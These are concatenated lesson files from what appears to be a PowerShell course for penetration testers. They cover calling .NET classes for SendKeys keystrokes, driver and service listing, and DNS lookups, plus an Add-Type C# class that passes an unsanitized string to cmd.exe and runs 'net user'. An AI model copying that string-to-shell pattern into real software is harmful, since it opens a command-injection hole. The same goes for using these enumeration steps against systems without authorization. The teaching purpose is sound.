[System.Diagnostics.Process]::GetCurrentProcess() ``` ```PowerShell PS C:\> [System.Diagnostics.Process]::GetProcesses() ``` ```PowerShell PS C:\> $ProcClass | Get-Member | Format-List * ``` ================================================ FILE: 28-Using-NET-in-Powershell-Part-2.md ================================================ #### 28. Using .NET in Powershell Part 2 ###### System.Windows.Forms - ```Add-Type``` Cmdlet with ```AssemblyName``` ```System.Windows.Forms``` ```PowerShell PS C:\> Add-Type -AssemblyName System.Windows.Forms ``` - Check if ```System.Windows.Forms``` is loaded ```PowerShell PS C:\> [System.Windows.Forms.SendKeys] IsPublic IsSerial Name BaseType -------- -------- ---- -------- True False SendKeys System.Object PS C:\> ``` - List ```Static``` members of ```System.Windows.Forms``` ```PowerShell PS C:\> [System.Windows.Forms.SendKeys] | Get-Member -Static TypeName: System.Windows.Forms.SendKeys Name MemberType Definition ---- ---------- ---------- Equals Method static bool Equals(System.Object objA, System.Object objB) Flush Method static System.Void Flush() ReferenceEquals Method static bool ReferenceEquals(System.Object objA, System.Object objB) Send Method static System.Void Send(string keys) SendWait Method static System.Void SendWait(string keys) PS C:\> ``` ```PowerShell PS C:\> [System.Windows.Forms.SendKeys] | Get-Member -Static | Format-List * TypeName : System.Windows.Forms.SendKeys Name : Equals MemberType : Method Definition : static bool Equals(System.Object objA, System.Object objB) TypeName : System.Windows.Forms.SendKeys Name : Flush MemberType : Method Definition : static System.Void Flush() TypeName : System.Windows.Forms.SendKeys Name : ReferenceEquals MemberType : Method Definition : static bool ReferenceEquals(System.Object objA, System.Object objB) TypeName : System.Windows.Forms.SendKeys Name : Send MemberType : Method Definition : static System.Void Send(string keys) TypeName : System.Windows.Forms.SendKeys Name : SendWait MemberType : Method Definition : static System.Void SendWait(string keys) PS C:\> ``` - Use ```SendWait``` ```Static``` member ```PowerShell PS C:\> [System.Windows.Forms.SendKeys]::SendWait MemberType : Method OverloadDefinitions : {static System.Void SendWait(string keys)} TypeNameOfValue : System.Management.Automation.PSMethod Value : static System.Void SendWait(string keys) Name : SendWait IsInstance : True PS C:\> ``` ```PowerShell PS C:\> [System.Windows.Forms.SendKeys]::SendWait("Powershell for Pentesters") PS C:\> Powershell for Pentesters PS C:\> ``` ###### System.ServiceProcess - ```Add-Type``` Cmdlet with ```AssemblyName``` ```System.ServiceProcess``` ```PowerShell PS C:\> Add-Type -AssemblyName System.ServiceProcess ``` - Check if ```System.ServiceProcess.ServiceController``` is loaded ```PowerShell PS C:\> [System.ServiceProcess.ServiceController] IsPublic IsSerial Name BaseType -------- -------- ---- -------- True False ServiceController System.ComponentModel.Component PS C:\> ``` - List ```Static``` members of ```System.ServiceProcess.ServiceController``` ```PowerShell PS C:\> [System.ServiceProcess.ServiceController] | Get-Member -Static TypeName: System.ServiceProcess.ServiceController Name MemberType Definition ---- ---------- ---------- Equals Method static bool Equals(System.Object objA, System.Object objB) GetDevices Method static System.ServiceProcess.ServiceController[] GetDevices(), static System.ServiceProcess.ServiceController[] GetDevices(string machineName) GetServices Method static System.ServiceProcess.ServiceController[] GetServices(), static System.ServiceProcess.ServiceController[] GetServices(string machineName) ReferenceEquals Method static bool ReferenceEquals(System.Object objA, System.Object objB) PS C:\> ``` ```PowerShell PS C:\> [System.ServiceProcess.ServiceController] | Get-Member -Static | Format-List * TypeName : System.ServiceProcess.ServiceController Name : Equals MemberType : Method Definition : static bool Equals(System.Object objA, System.Object objB) TypeName : System.ServiceProcess.ServiceController Name : GetDevices MemberType : Method Definition : static System.ServiceProcess.ServiceController[] GetDevices(), static System.ServiceProcess.ServiceController[] GetDevices(string machineName) TypeName : System.ServiceProcess.ServiceController Name : GetServices MemberType : Method Definition : static System.ServiceProcess.ServiceController[] GetServices(), static System.ServiceProcess.ServiceController[] GetServices(string machineName) TypeName : System.ServiceProcess.ServiceController Name : ReferenceEquals MemberType : Method Definition : static bool ReferenceEquals(System.Object objA, System.Object objB) PS C:\> ``` - Use ```GetDevices``` ```Static``` member ```PowerShell PS C:\> [System.ServiceProcess.ServiceController]::GetDevices() Status Name DisplayName ------ ---- ----------- Stopped 1394ohci 1394 OHCI Compliant Host Controller Running ACPI Microsoft ACPI Driver Stopped AcpiPmi ACPI Power Meter Driver Stopped adp94xx adp94xx Stopped adpahci adpahci Stopped adpu320 adpu320 Running AFD Ancillary Function Driver for Winsock Stopped agp440 Intel AGP Bus Filter Stopped aic78xx aic78xx Stopped aliide aliide Stopped amdagp AMD AGP Bus Filter Driver Stopped amdide amdide Stopped AmdK8 AMD K8 Processor Driver Stopped AmdPPM AMD Processor Driver Stopped amdsata amdsata Stopped amdsbs amdsbs Running amdxata amdxata Stopped AppID AppID Driver Stopped arc arc Stopped arcsas arcsas Stopped AsyncMac RAS Asynchronous Media Driver Running atapi IDE Channel Stopped b06bdrv Broadcom NetXtreme II VBD Stopped b57nd60x Broadcom NetXtreme Gigabit Ethernet... Running Beep Beep Running blbdrive blbdrive Running bowser Browser Support Driver Stopped BrFiltLo Brother USB Mass-Storage Lower Filt... Stopped BrFiltUp Brother USB Mass-Storage Upper Filt... Stopped Brserid Brother MFC Serial Port Interface D... Stopped BrSerWdm Brother WDM Serial driver Stopped BrUsbMdm Brother MFC USB Fax Only Modem Stopped BrUsbSer Brother MFC USB Serial WDM Driver Stopped BTHMODEM Bluetooth Serial Communications Driver Stopped cdfs CD/DVD File System Reader Running cdrom CD-ROM Driver Stopped circlass Consumer IR Devices Running CLFS Common Log (CLFS) Stopped CmBatt Microsoft ACPI Control Method Batte... Stopped cmdide cmdide Running CNG CNG Running Compbatt Microsoft Composite Battery Driver Stopped CompositeBus Composite Bus Enumerator Driver Stopped crcdisk Crcdisk Filter Driver Running CSC Offline Files Driver Running DfsC DFS Namespace Client Driver Running discache System Attribute Cache Running Disk Disk Driver Stopped drmkaud Microsoft Trusted Audio Drivers Stopped DXGKrnl LDDM Graphics Subsystem Stopped E1G60 Intel(R) PRO/1000 NDIS 6 Adapter Dr... Stopped ebdrv Broadcom NetXtreme II 10 GigE VBD Stopped elxstor elxstor Stopped ErrDev Microsoft Hardware Error Device Driver Stopped exfat exFAT File System Driver Stopped fastfat FAT12/16/32 File System Driver Stopped fdc Floppy Disk Controller Driver Running FileInfo File Information FS MiniFilter Stopped Filetrace Filetrace Stopped flpydisk Floppy Disk Driver Running FltMgr FltMgr Stopped FsDepends File System Dependency Minifilter Running fvevol Bitlocker Drive Encryption Filter D... Stopped gagp30kx Microsoft Generic AGPv3.0 Filter fo... Stopped hcw85cir Hauppauge Consumer Infrared Receiver Stopped HdAudAddService Microsoft 1.1 UAA Function Driver f... Stopped HDAudBus Microsoft UAA Bus Driver for High D... Stopped HidBatt HID UPS Battery Driver Stopped HidBth Microsoft Bluetooth HID Miniport Stopped HidIr Microsoft Infrared HID Driver Stopped HidUsb Microsoft HID Class Driver Stopped HpSAMD HpSAMD Running HTTP HTTP Running hwpolicy Hardware Policy Driver Stopped i8042prt i8042 Keyboard and PS/2 Mouse Port ... Stopped iaStorV iaStorV Stopped iirsp iirsp Stopped intelide intelide Stopped intelppm Intel Processor Driver Stopped IpFilterDriver IP Traffic Filter Driver Stopped IPMIDRV IPMIDRV Stopped IPNAT IP Network Address Translator Stopped IRENUM IR Bus Enumerator Stopped isapnp isapnp Stopped iScsiPrt iScsiPort Driver Stopped kbdclass Keyboard Class Driver Stopped kbdhid Keyboard HID Driver Running KSecDD KSecDD Running KSecPkg KSecPkg Running lltdio Link-Layer Topology Discovery Mappe... Stopped LSI_FC LSI_FC Stopped LSI_SAS LSI_SAS Stopped LSI_SAS2 LSI_SAS2 Stopped LSI_SCSI LSI_SCSI Running luafv UAC File Virtualization Stopped megasas megasas Stopped MegaSR MegaSR Stopped Modem Modem Stopped monitor Microsoft Monitor Class Function Dr... Stopped mouclass Mouse Class Driver Stopped mouhid Mouse HID Driver Running mountmgr Mount Point Manager Stopped mpio mpio Running mpsdrv Windows Firewall Authorization Driver Stopped MRxDAV WebDav Client Redirector Driver Running mrxsmb SMB MiniRedirector Wrapper and Engine Running mrxsmb10 SMB 1.x MiniRedirector Running mrxsmb20 SMB 2.0 MiniRedirector Running msahci msahci Stopped msdsm msdsm Running Msfs Msfs Stopped mshidkmdf Pass-through HID to KMDF Filter Driver Running msisadrv msisadrv Stopped MSKSSRV Microsoft Streaming Service Proxy Stopped MSPCLOCK Microsoft Streaming Clock Proxy Stopped MSPQM Microsoft Streaming Quality Manager... Stopped MsRPC MsRPC Running mssmbios Microsoft System Management BIOS Dr... Stopped MSTEE Microsoft Streaming Tee/Sink-to-Sin... Stopped MTConfig Microsoft Input Configuration Driver Running Mup Mup Stopped NativeWifiP NativeWiFi Filter Running NDIS NDIS System Driver Stopped NdisCap NDIS Capture LightWeight Filter Stopped NdisTapi Remote Access NDIS TAPI Driver Stopped Ndisuio NDIS Usermode I/O Protocol Stopped NdisWan Remote Access NDIS WAN Driver Stopped NDProxy NDIS Proxy Running NetBIOS NetBIOS Interface Running NetBT NetBT Stopped nfrd960 nfrd960 Running Npfs Npfs Running nsiproxy NSI proxy service driver. Stopped Ntfs Ntfs Running Null Null Stopped nvraid nvraid Stopped nvstor nvstor Stopped nv_agp NVIDIA nForce AGP Bus Filter Stopped ohci1394 1394 OHCI Compliant Host Controller... Stopped Parport Parallel port driver Running partmgr Partition Manager Stopped Parvdm Parvdm Running pci PCI Bus Driver Stopped pciide pciide Stopped pcmcia pcmcia Running pcw Performance Counters for Windows Dr... Running PEAUTH PEAUTH Stopped PptpMiniport WAN Miniport (PPTP) Stopped Processor Processor Driver Running Psched QoS Packet Scheduler Stopped ql2300 ql2300 Stopped ql40xx ql40xx Stopped QWAVEdrv QWAVE driver Stopped RasAcd Remote Access Auto Connection Driver Stopped RasAgileVpn WAN Miniport (IKEv2) Stopped Rasl2tp WAN Miniport (L2TP) Stopped RasPppoe Remote Access PPPOE Driver Stopped RasSstp WAN Miniport (SSTP) Running rdbss Redirected Buffering Sub Sysytem Stopped rdpbus Remote Desktop Device Redirector Bu... Running RDPCDD RDPCDD Running RDPDR Terminal Server Device Redirector D... Running RDPENCDD RDP Encoder Mirror Driver Running RDPREFMP Reflector Display Driver used to ga... Stopped RDPWD RDP Winstation Driver Running rdyboost ReadyBoost Running rspndr Link-Layer Topology Discovery Respo... Stopped s3cap s3cap Stopped sbp2port sbp2port Stopped scfilter Smart card PnP Class Filter Driver Running secdrv Security Driver Stopped Serenum Serenum Filter Driver Stopped Serial Serial Port Driver Stopped sermouse Serial Mouse Driver Stopped sffdisk SFF Storage Class Driver Stopped sffp_mmc SFF Storage Protocol Driver for MMC Stopped sffp_sd SFF Storage Protocol Driver for SDBus Stopped sfloppy High-Capacity Floppy Disk Drive Stopped sisagp SIS AGP Bus Filter Stopped SiSRaid2 SiSRaid2 Stopped SiSRaid4 SiSRaid4 Stopped Smb Message-oriented TCP/IP and TCP/IPv... Running spldr Security Processor Loader Driver Running srv Server SMB 1.xxx Driver Running srv2 Server SMB 2.xxx Driver Running srvnet srvnet Stopped stexstor stexstor Running storflt Disk Virtual Machine Bus Accelerati... Stopped storvsc storvsc Stopped swenum Software Bus Driver Running Tcpip TCP/IP Protocol Driver Stopped TCPIP6 Microsoft IPv6 Protocol Driver Running tcpipreg TCP/IP Registry Compatibility Stopped TDPIPE TDPIPE Stopped TDTCP TDTCP Running tdx NetIO Legacy TDI Support Driver Running TermDD Terminal Device Driver Stopped tssecsrv Remote Desktop Services Security Fi... Stopped tunnel Microsoft Tunnel Miniport Adapter D... Stopped uagp35 Microsoft AGPv3.5 Filter Stopped udfs udfs Stopped uliagpkx Uli AGP Bus Filter Stopped umbus UMBus Enumerator Driver Stopped UmPass Microsoft UMPass Driver Stopped usbccgp Microsoft USB Generic Parent Driver Stopped usbcir eHome Infrared Receiver (USBCIR) Stopped usbehci Microsoft USB 2.0 Enhanced Host Con... Stopped usbhub Microsoft USB Standard Hub Driver Stopped usbohci Microsoft USB Open Host Controller ... Stopped usbprint Microsoft USB PRINTER Class Stopped USBSTOR USB Mass Storage Driver Stopped usbuhci Microsoft USB Universal Host Contro... Running VBoxGuest VirtualBox Guest Driver Stopped VBoxMouse VirtualBox Guest Mouse Service Running VBoxSF VirtualBox Shared Folders Stopped VBoxVideo VBoxVideo Running vdrvroot Microsoft Virtual Drive Enumerator ... Stopped vga vga Running VgaSave VgaSave Stopped vhdmp vhdmp Stopped viaagp VIA AGP Bus Filter Stopped ViaC7 VIA C7 Processor Driver Stopped viaide viaide Stopped vmbus Virtual Machine Bus Stopped VMBusHID VMBusHID Running volmgr Volume Manager Driver Running volmgrx Dynamic Volume Manager Running volsnap Storage volumes Stopped vsmraid vsmraid Stopped vwifibus Virtual WiFi Bus Driver Stopped WacomPen Wacom Serial Pen HID Driver Stopped WANARP Remote Access IP ARP Driver Running Wanarpv6 Remote Access IPv6 ARP Driver Stopped Wd Wd Running Wdf01000 Kernel Mode Driver Frameworks service Running WfpLwf WFP Lightweight Filter Stopped WIMMount WIMMount Stopped WmiAcpi Microsoft Windows Management Interf... Stopped ws2ifsl Winsock IFS Driver Stopped WudfPf User Mode Driver Frameworks Platfor... PS C:\> ``` ###### Exercise - Explore the .Net assemblies and find one which deals with DNS. (–match is your friend) - [Dns Class](https://msdn.microsoft.com/en-us/library/system.net.dns(v=vs.110).aspx) - Explore the class and do a DNS lookup using a static method (or otherwise) ```Solution``` - ```Add-Type``` Cmdlet with ```AssemblyName``` ```System.Net``` ```PowerShell PS C:\> Add-Type -AssemblyName System.Net ``` - Check if ```System.Net.Dns``` is loaded ```PowerShell PS C:\> [System.Net.Dns] IsPublic IsSerial Name BaseType -------- -------- ---- -------- True False Dns System.Object PS C:\> ``` - List ```Static``` members of ```System.Net.Dns``` ```PowerShell PS C:\> [System.Net.Dns] | Get-Member -Static TypeName: System.Net.Dns Name MemberType Definition ---- ---------- ---------- BeginGetHostAddresses Method static System.IAsyncResult BeginGetHostAddresses(string hostNameOrAddress, System.AsyncCallback requestCallback, System.Object state) BeginGetHostByName Method static System.IAsyncResult BeginGetHostByName(string hostName, System.AsyncCallback requestCallback, System.Object stateObject) BeginGetHostEntry Method static System.IAsyncResult BeginGetHostEntry(string hostNameOrAddress, System.AsyncCallback requestCallback, System.Object stateObject), static System.IAsyncResult BeginGetHostEntry(ipaddress address, System.AsyncCallback requestCallback, System.Object stateObject) BeginResolve Method static System.IAsyncResult BeginResolve(string hostName, System.AsyncCallback requestCallback, System.Object stateObject) EndGetHostAddresses Method static ipaddress[] EndGetHostAddresses(System.IAsyncResult asyncResult) EndGetHostByName Method static System.Net.IPHostEntry EndGetHostByName(System.IAsyncResult asyncResult) EndGetHostEntry Method static System.Net.IPHostEntry EndGetHostEntry(System.IAsyncResult asyncResult) EndResolve Method static System.Net.IPHostEntry EndResolve(System.IAsyncResult asyncResult) Equals Method static bool Equals(System.Object objA, System.Object objB) GetHostAddresses Method static ipaddress[] GetHostAddresses(string hostNameOrAddress) GetHostByAddress Method static System.Net.IPHostEntry GetHostByAddress(string address), static System.Net.IPHostEntry GetHostByAddress(ipaddress address) GetHostByName Method static System.Net.IPHostEntry GetHostByName(string hostName) GetHostEntry Method static System.Net.IPHostEntry GetHostEntry(string hostNameOrAddress), static System.Net.IPHostEntry GetHostEntry(ipaddress address) GetHostName Method static string GetHostName() ReferenceEquals Method static bool ReferenceEquals(System.Object objA, System.Object objB) Resolve Method static System.Net.IPHostEntry Resolve(string hostName) PS C:\> ``` ```PowerShell PS C:\> [System.Net.Dns] | Get-Member -Static | Format-List * TypeName : System.Net.Dns Name : BeginGetHostAddresses MemberType : Method Definition : static System.IAsyncResult BeginGetHostAddresses(string hostNameOrAddress, System.AsyncCallback requestCallback, System.Object state) TypeName : System.Net.Dns Name : BeginGetHostByName MemberType : Method Definition : static System.IAsyncResult BeginGetHostByName(string hostName, System.AsyncCallback requestCallback, System.Object stateObject) TypeName : System.Net.Dns Name : BeginGetHostEntry MemberType : Method Definition : static System.IAsyncResult BeginGetHostEntry(string hostNameOrAddress, System.AsyncCallback requestCallback, System.Object stateObject), static System.IAsyncResult BeginGetHostEntry(ipaddress address, System.AsyncCallback requestCallback, System.Object stateObject) TypeName : System.Net.Dns Name : BeginResolve MemberType : Method Definition : static System.IAsyncResult BeginResolve(string hostName, System.AsyncCallback requestCallback, System.Object stateObject) TypeName : System.Net.Dns Name : EndGetHostAddresses MemberType : Method Definition : static ipaddress[] EndGetHostAddresses(System.IAsyncResult asyncResult) TypeName : System.Net.Dns Name : EndGetHostByName MemberType : Method Definition : static System.Net.IPHostEntry EndGetHostByName(System.IAsyncResult asyncResult) TypeName : System.Net.Dns Name : EndGetHostEntry MemberType : Method Definition : static System.Net.IPHostEntry EndGetHostEntry(System.IAsyncResult asyncResult) TypeName : System.Net.Dns Name : EndResolve MemberType : Method Definition : static System.Net.IPHostEntry EndResolve(System.IAsyncResult asyncResult) TypeName : System.Net.Dns Name : Equals MemberType : Method Definition : static bool Equals(System.Object objA, System.Object objB) TypeName : System.Net.Dns Name : GetHostAddresses MemberType : Method Definition : static ipaddress[] GetHostAddresses(string hostNameOrAddress) TypeName : System.Net.Dns Name : GetHostByAddress MemberType : Method Definition : static System.Net.IPHostEntry GetHostByAddress(string address), static System.Net.IPHostEntry GetHostByAddress(ipaddress address) TypeName : System.Net.Dns Name : GetHostByName MemberType : Method Definition : static System.Net.IPHostEntry GetHostByName(string hostName) TypeName : System.Net.Dns Name : GetHostEntry MemberType : Method Definition : static System.Net.IPHostEntry GetHostEntry(string hostNameOrAddress), static System.Net.IPHostEntry GetHostEntry(ipaddress address) TypeName : System.Net.Dns Name : GetHostName MemberType : Method Definition : static string GetHostName() TypeName : System.Net.Dns Name : ReferenceEquals MemberType : Method Definition : static bool ReferenceEquals(System.Object objA, System.Object objB) TypeName : System.Net.Dns Name : Resolve MemberType : Method Definition : static System.Net.IPHostEntry Resolve(string hostName) PS C:\> ``` - Use ```GetHostAddresses ``` ```Static``` member ```PowerShell PS C:\> [System.Net.Dns]::GetHostAddresses("www.google.com") Address : AddressFamily : InterNetworkV6 ScopeId : 0 IsIPv6Multicast : False IsIPv6LinkLocal : False IsIPv6SiteLocal : False IPAddressToString : 2607:f8b0:4005:809::2004 Address : 604428716 AddressFamily : InterNetwork ScopeId : IsIPv6Multicast : False IsIPv6LinkLocal : False IsIPv6SiteLocal : False IPAddressToString : 172.217.6.36 PS C:\> ``` ================================================ FILE: 29-Using-NET-in-Powershell-Part-3.md ================================================ #### 29. Using .NET in Powershell Part 3 ###### Add-Type - Use ```Add-Type``` with ```-FromSource``` - ```New-Object``` ```Invoke-SysCommands.ps1``` ```PowerShell $DotnetCode = @" public class SysCommands { public static void lookup(string domainname) { System.Diagnostics.Process.Start("nslookup.exe",domainname); } public void netcmd (string cmd) { string cmdstring = "/k net.exe " + cmd; System.Diagnostics.Process.Start("cmd.exe",cmdstring); } } "@ Add-Type -TypeDefinition $DotnetCode #[SysCommands]::lookup("google.com") $obj = New-Object SysCommands $obj.netcmd("user") ``` ![Image of SysCommands](images/5.jpeg) ================================================ FILE: 3-Exploring-and-using-Cmdlets.md ================================================ #### 3. Exploring and using Cmdlets - ```Get-Help``` for ```Get-Command``` Cmdlets ```Powershell PS C:\Users\Windows-32> Get-Help Get-Command NAME Get-Command SYNOPSIS Gets basic information about cmdlets and other elements of Windows PowerShell commands. SYNTAX Get-Command [[-Name] ] [-CommandType {Alias | Function | Filter | Cmdlet | ExternalScript | Application | Script | All}] [[-ArgumentList] ] [-Module ] [-Syntax] [-TotalCount ] [ ] Get-Command [-Noun ] [-Verb ] [[-ArgumentList] ] [-Module ] [-Syntax] [-Tot alCount ] [] DESCRIPTION The Get-Command cmdlet gets basic information about cmdlets and other elements of Windows PowerShell commands in th e session, such as aliases, functions, filters, scripts, and applications. Get-Command gets its data directly from the code of a cmdlet, function, script, or alias, unlike Get-Help, which ge ts its information from help topic files. Without parameters, "Get-Command" gets all of the cmdlets and functions in the current session. "Get-Command *" get s all Windows PowerShell elements and all of the non-Windows-PowerShell files in the Path environment variable ($en v:path). It groups the files in the "Application" command type. You can use the Module parameter of Get-Command to find the commands that were added to the session by adding a Win dows PowerShell snap-in or importing a module. RELATED LINKS Online version: http://go.microsoft.com/fwlink/?LinkID=113309 about_Command_Precedence Get-Help Get-PSDrive Get-Member Import-PSSession Export-PSSession REMARKS To see the examples, type: "get-help Get-Command -examples". For more information, type: "get-help Get-Command -detailed". For technical information, type: "get-help Get-Command -full". PS C:\Users\Windows-32> ``` - ```Get-Command``` Cmdlets ```Powershell PS C:\Users\Windows-32> Get-Command CommandType Name Definition ----------- ---- ---------- Alias % ForEach-Object Alias ? Where-Object Function A: Set-Location A: Alias ac Add-Content Cmdlet Add-Computer Add-Computer [-DomainName] [-Credential... Cmdlet Add-Content Add-Content [-Path] [-Value] ] [-Pass... Cmdlet Add-Member Add-Member [-MemberType] [-Name]... Cmdlet Add-PSSnapin Add-PSSnapin [-Name] [-PassThru] [-Ve... Cmdlet Add-Type Add-Type [-TypeDefinition] [-Language <... Alias asnp Add-PSSnapIn Function B: Set-Location B: Function C: Set-Location C: Alias cat Get-Content Alias cd Set-Location Function cd.. Set-Location .. Function cd\ Set-Location \ Alias chdir Set-Location Cmdlet Checkpoint-Computer Checkpoint-Computer [-Description] [[-R... Alias clc Clear-Content Alias clear Clear-Host Cmdlet Clear-Content Clear-Content [-Path] [-Filter [[-Computer... Cmdlet Clear-History Clear-History [[-Id] ] [[-Count] [-Force] [-Filter ... Cmdlet Clear-ItemProperty Clear-ItemProperty [-Path] [-Name] [-Include [... Cmdlet Complete-Transaction Complete-Transaction [-Verbose] [-Debug] [-Error... Cmdlet Connect-WSMan Connect-WSMan [[-ComputerName] ] [-Appli... Cmdlet ConvertFrom-Csv ConvertFrom-Csv [-InputObject] [[-D... Cmdlet ConvertFrom-SecureString ConvertFrom-SecureString [-SecureString] [-... Cmdlet Convert-Path Convert-Path [-Path] [-Verbose] [-Deb... Cmdlet ConvertTo-Csv ConvertTo-Csv [-InputObject] [[-Delim... Cmdlet ConvertTo-Html ConvertTo-Html [[-Property] ] [[-Head]... Cmdlet ConvertTo-SecureString ConvertTo-SecureString [-String] [[-Sec... Cmdlet ConvertTo-Xml ConvertTo-Xml [-InputObject] [-Depth ... Alias copy Copy-Item Cmdlet Copy-Item Copy-Item [-Path] [[-Destination] [-Destinati... Alias cp Copy-Item Alias cpi Copy-Item Alias cpp Copy-ItemProperty Alias cvpa Convert-Path Function D: Set-Location D: Alias dbp Disable-PSBreakpoint Cmdlet Debug-Process Debug-Process [-Name] [-Verbose] [-De... Alias del Remove-Item Alias diff Compare-Object Alias dir Get-ChildItem Cmdlet Disable-ComputerRestore Disable-ComputerRestore [-Drive] [-Ve... Cmdlet Disable-PSBreakpoint Disable-PSBreakpoint [-Breakpoint] [-Verbose]... Cmdlet Disconnect-WSMan Disconnect-WSMan [[-ComputerName] ] [-Ve... Function E: Set-Location E: Alias ebp Enable-PSBreakpoint Alias echo Write-Output Cmdlet Enable-ComputerRestore Enable-ComputerRestore [-Drive] [-Ver... Cmdlet Enable-PSBreakpoint Enable-PSBreakpoint [-Id] [-PassThru] ... Cmdlet Enable-PSRemoting Enable-PSRemoting [-Force] [-Verbose] [-Debug] [... Cmdlet Enable-PSSessionConfiguration Enable-PSSessionConfiguration [[-Name] [[-Delegate... Cmdlet Enter-PSSession Enter-PSSession [-ComputerName] [-Crede... Alias epal Export-Alias Alias epcsv Export-Csv Alias epsn Export-PSSession Alias erase Remove-Item Alias etsn Enter-PSSession Cmdlet Exit-PSSession Exit-PSSession [-Verbose] [-Debug] [-ErrorAction... Cmdlet Export-Alias Export-Alias [-Path] [[-Name] [-Depth ] ... Cmdlet Export-Console Export-Console [[-Path] ] [-Force] [-NoC... Cmdlet Export-Counter Export-Counter [-Path] [-FileFormat [[-Delimiter] ... Cmdlet Export-FormatData Export-FormatData [-InputObject ] [-C... Cmdlet Export-PSSession Export-PSSession [-Session] [-Output... Alias exsn Exit-PSSession Function F: Set-Location F: Alias fc Format-Custom Alias fl Format-List Alias foreach ForEach-Object Cmdlet ForEach-Object ForEach-Object [-Process] [-Inpu... Cmdlet Format-Custom Format-Custom [[-Property] ] [-Depth <... Cmdlet Format-List Format-List [[-Property] ] [-GroupBy <... Cmdlet Format-Table Format-Table [[-Property] ] [-AutoSize... Cmdlet Format-Wide Format-Wide [[-Property] ] [-AutoSize] [... Alias ft Format-Table Alias fw Format-Wide Function G: Set-Location G: Alias gal Get-Alias Alias gbp Get-PSBreakpoint Alias gc Get-Content Alias gci Get-ChildItem Alias gcm Get-Command Alias gcs Get-PSCallStack Alias gdr Get-PSDrive Cmdlet Get-Acl Get-Acl [[-Path] ] [-Audit] [-Filter <... Cmdlet Get-Alias Get-Alias [[-Name] ] [-Exclude ... Cmdlet Get-ChildItem Get-ChildItem [[-Path] ] [[-Filter] ] [-Verb ... Cmdlet Get-ComputerRestorePoint Get-ComputerRestorePoint [[-RestorePoint] [-ReadCount ] [-SampleInte... Cmdlet Get-Credential Get-Credential [-Credential] [-Ve... Cmdlet Get-Culture Get-Culture [-Verbose] [-Debug] [-ErrorAction ] [-Year ] [-... Cmdlet Get-Event Get-Event [[-SourceIdentifier] ] [-Verbo... Cmdlet Get-EventLog Get-EventLog [-LogName] [[-InstanceId] ... Cmdlet Get-EventSubscriber Get-EventSubscriber [[-SourceIdentifier] ] [-Verbos... Cmdlet Get-Help Get-Help [[-Name] ] [-Path ] [-C... Cmdlet Get-History Get-History [[-Id] ] [[-Count] ]... Cmdlet Get-Host Get-Host [-Verbose] [-Debug] [-ErrorAction ] [-ComputerName [-Filter ] [... Cmdlet Get-ItemProperty Get-ItemProperty [-Path] [[-Name] ] [-Verbose] [-Debug] [-... Cmdlet Get-Location Get-Location [-PSProvider ] [-PSDrive ... Cmdlet Get-Member Get-Member [[-Name] ] [-InputObject ] [-All] [-Verbose... Cmdlet Get-PfxCertificate Get-PfxCertificate [-FilePath] [-Verb... Cmdlet Get-Process Get-Process [[-Name] ] [-ComputerName ... Cmdlet Get-PSBreakpoint Get-PSBreakpoint [[-Script] ] [-Verbos... Cmdlet Get-PSCallStack Get-PSCallStack [-Verbose] [-Debug] [-ErrorActio... Cmdlet Get-PSDrive Get-PSDrive [[-Name] ] [-Scope ] [-Verb... Cmdlet Get-PSSession Get-PSSession [[-ComputerName] ] [-Ver... Cmdlet Get-PSSessionConfiguration Get-PSSessionConfiguration [[-Name] ] ... Cmdlet Get-PSSnapin Get-PSSnapin [[-Name] ] [-Registered] ... Cmdlet Get-Random Get-Random [[-Maximum] ] [-SetSeed ] [-ComputerName ... Cmdlet Get-TraceSource Get-TraceSource [[-Name] ] [-Verbose] ... Cmdlet Get-Transaction Get-Transaction [-Verbose] [-Debug] [-ErrorActio... Cmdlet Get-UICulture Get-UICulture [-Verbose] [-Debug] [-ErrorAction ... Cmdlet Get-Unique Get-Unique [-InputObject ] [-AsString]... Cmdlet Get-Variable Get-Variable [[-Name] ] [-ValueOnly] [... Function Get-Verb ... Cmdlet Get-WinEvent Get-WinEvent [[-LogName] ] [-MaxEvents... Cmdlet Get-WmiObject Get-WmiObject [-Class] [[-Property] [-Applica... Alias ghy Get-History Alias gi Get-Item Alias gjb Get-Job Alias gl Get-Location Alias gm Get-Member Alias gmo Get-Module Alias gp Get-ItemProperty Alias gps Get-Process Alias group Group-Object Cmdlet Group-Object Group-Object [[-Property] ] [-NoElemen... Alias gsn Get-PSSession Alias gsnp Get-PSSnapIn Alias gsv Get-Service Alias gu Get-Unique Alias gv Get-Variable Alias gwmi Get-WmiObject Alias h Get-History Function H: Set-Location H: Function help ... Alias history Get-History Function I: Set-Location I: Alias icm Invoke-Command Alias iex Invoke-Expression Alias ihy Invoke-History Alias ii Invoke-Item Cmdlet Import-Alias Import-Alias [-Path] [-Scope ] ... Cmdlet Import-Clixml Import-Clixml [-Path] [-Verbose] [-De... Cmdlet Import-Counter Import-Counter [-Path] [-StartTime [[-Delimiter] ... Cmdlet Import-Module Import-Module [-Name] [-Global] [-Pre... Cmdlet Import-PSSession Import-PSSession [-Session] [[-Comma... Function ImportSystemModules ... Cmdlet Invoke-Command Invoke-Command [-ScriptBlock] [-In... Cmdlet Invoke-Expression Invoke-Expression [-Command] [-Verbose]... Cmdlet Invoke-History Invoke-History [[-Id] ] [-Verbose] [-Deb... Cmdlet Invoke-Item Invoke-Item [-Path] [-Filter ... Cmdlet Invoke-WmiMethod Invoke-WmiMethod [-Class] [-Name] [-Action... Alias ipal Import-Alias Alias ipcsv Import-Csv Alias ipmo Import-Module Alias ipsn Import-PSSession Alias ise powershell_ise.exe Alias iwmi Invoke-WMIMethod Function J: Set-Location J: Cmdlet Join-Path Join-Path [-Path] [-ChildPath] [-ComputerN... Alias lp Out-Printer Alias ls Get-ChildItem Function M: Set-Location M: Alias man help Alias md mkdir Alias measure Measure-Object Cmdlet Measure-Command Measure-Command [-Expression] [-In... Cmdlet Measure-Object Measure-Object [[-Property] ] [-InputO... Alias mi Move-Item Function mkdir ... Function more param([string[]]$paths)... Alias mount New-PSDrive Alias move Move-Item Cmdlet Move-Item Move-Item [-Path] [[-Destination] [-Destinati... Alias mp Move-ItemProperty Alias mv Move-Item Function N: Set-Location N: Alias nal New-Alias Alias ndr New-PSDrive Cmdlet New-Alias New-Alias [-Name] [-Value] [-D... Cmdlet New-Event New-Event [-SourceIdentifier] [[-Sender... Cmdlet New-EventLog New-EventLog [-LogName] [-Source] [-ItemType ]... Cmdlet New-ItemProperty New-ItemProperty [-Path] [-Name] [-Functi... Cmdlet New-ModuleManifest New-ModuleManifest [-Path] -NestedModul... Cmdlet New-Object New-Object [-TypeName] [[-ArgumentList]... Cmdlet New-PSDrive New-PSDrive 